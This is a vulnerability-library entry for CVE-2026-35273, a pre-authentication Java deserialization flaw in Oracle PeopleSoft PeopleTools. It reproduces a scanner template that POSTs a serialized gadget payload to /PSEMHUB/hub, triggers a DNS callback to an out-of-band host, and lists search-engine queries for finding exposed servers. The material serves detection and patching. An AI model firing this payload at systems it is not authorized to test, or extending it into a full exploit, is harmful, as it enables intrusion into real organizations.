/Vulnerability Library

Oracle PeopleSoft PeopleTools PSEMHUB - Pre-Auth Java Deserialization RCE

CVE-2026-35273
Verified

Description

Oracle PeopleSoft PeopleTools 8.61 and 8.62 contain a remote code execution vulnerability in Updates Environment Management, letting unauthenticated network attackers fully compromise the system, exploit requires network access via HTTP.

Severity

Critical

CVSS Score

9.8

Exploit Probability

94%

Affected Product

peoplesoft_enterprise_peopletools

Published Date

June 16, 2026

Template Author

dhiyaneshdk

CVE-2026-35273.yaml
id: CVE-2026-35273

info:
  name: Oracle PeopleSoft PeopleTools PSEMHUB - Pre-Auth Java Deserialization RCE
  author: DhiyaneshDk
  severity: critical
  description: |
    Oracle PeopleSoft PeopleTools 8.61 and 8.62 contain a remote code execution vulnerability in Updates Environment Management, letting unauthenticated network attackers fully compromise the system, exploit requires network access via HTTP.
  impact: |
    Unauthenticated attackers can fully compromise PeopleSoft Enterprise PeopleTools, leading to complete system takeover.
  remediation: |
    Update to the latest available version beyond 8.62.
  reference:
    - https://www.oracle.com/security-alerts/alert-cve-2026-35273.html
    - https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit
    - https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-35273
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-35273
    epss-score: 0.93997
    epss-percentile: 0.99836
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: peoplesoft_enterprise_peopletools
    shodan-query: http.html:"PeopleSoft"
    fofa-query: body="PeopleSoft Environment Management Hub"
  tags: cve,cve2026,oracle,peoplesoft,deserialization,rce,kev,oast,vkev

http:
  - raw:
      - |
        POST /PSEMHUB/hub HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        OPERATION={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'rO0ABX')"
          - "contains(interactsh_protocol, 'dns')"
        condition: and
# digest: 4a0a00473045022100e96db8297fe59a5fd56c6b1062db347b1e200f5f54638c20bf4ca1532af006c1022040c30a1a97316586cca34c406c8bf0e8e1f4a7c5bb668166b9106aba2185a64f:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-35273
CWE ID:
cwe-502

References

https://www.oracle.com/security-alerts/alert-cve-2026-35273.htmlhttps://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploithttps://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273/https://nvd.nist.gov/vuln/detail/CVE-2026-35273

Remediation Steps

Update to the latest available version beyond 8.62.